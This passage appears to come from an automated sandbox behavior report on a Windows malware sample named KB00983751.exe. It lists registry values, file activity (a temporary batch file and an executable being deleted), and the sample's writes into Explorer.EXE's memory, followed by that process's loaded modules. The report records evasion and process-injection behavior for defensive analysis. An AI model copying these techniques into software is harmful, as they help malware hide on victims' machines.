Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000002200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ AutoRun ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ PathCompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ midimapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.iac2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.imaadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.l3acm ], Value: [ C:\WINDOWS\system32\l3codeca.acm ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msaudio1 ], Value: [ msaud32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg711 ], Value: [ msg711.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg723 ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msgsm610 ], Value: [ msgsm32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.sl_anet ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.trspch ], Value: [ tssoft32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.I420 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M261 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M263 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.cvid ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv31 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv32 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv41 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv50 ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iyuv ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.mrle ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.msvc ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.uyvy ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yuy2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvu9 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvyu ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ wavemapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Language Groups ],
Value Name: [ 1 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Locale ],
Value Name: [ 00000C07 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
Value Name: [ ProductType ], Value: [ WinNT ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 9 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Multimedia\Audio ],
Value Name: [ SystemFormats ], Value: [ CD Quality,Radio Quality,Telephone Quality ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time
[=============================================================================]
4.b) cmd.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Deleted:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\bc9deebcb0.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Device Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 1 time
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSACM32.dll ]
File Name: [ C:\WINDOWS\system32\SHELL32.dll ]
File Name: [ C:\WINDOWS\system32\ShimEng.dll ]
File Name: [ C:\WINDOWS\system32\UxTheme.dll ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
[#############################################################################]
5. Explorer.EXE
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: KB00983751.exe wrote to the virtual memory of this process
Filename: Explorer.EXE
MD5: 12896823fb95bfb3dc9b46bcaedc9923
SHA-1: 9d2bf84874abc5b6e9a2744b7865c193c08d362f
File Size: 1033728 Bytes
Command Line: C:\WINDOWS\Explorer.EXE
Process-status at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\BROWSEUI.dll ],
Base Address: [0x75F80000 ], Size: [0x000FD000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\SHDOCVW.dll ],
Base Address: [0x7E290000 ], Size: [0x00171000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\CRYPTUI.dll ],
Base Address: [0x754D0000 ], Size: [0x00080000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\WINTRUST.dll ],
Base Address: [0x76C30000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\IMAGEHLP.dll ],
Base Address: [0x76C90000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
Base Address: [0x76F60000 ], Size: [0x0002C000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\System32\cscui.dll ],
Base Address: [0x77A20000 ], Size: [0x00054000 ]
Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
Base Address: [0x76600000 ], Size: [0x0001D000 ]
Module Name: [ C:\WINDOWS\system32\themeui.dll ],
Base Address: [0x5BA60000 ], Size: [0x00071000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00AC0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\actxprxy.dll ],
Base Address: [0x71D40000 ], Size: [0x0001B000 ]
Module Name: [ C:\WINDOWS\system32\msutb.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
Base Address: [0x7E1E0000 ], Size: [0x000A2000 ]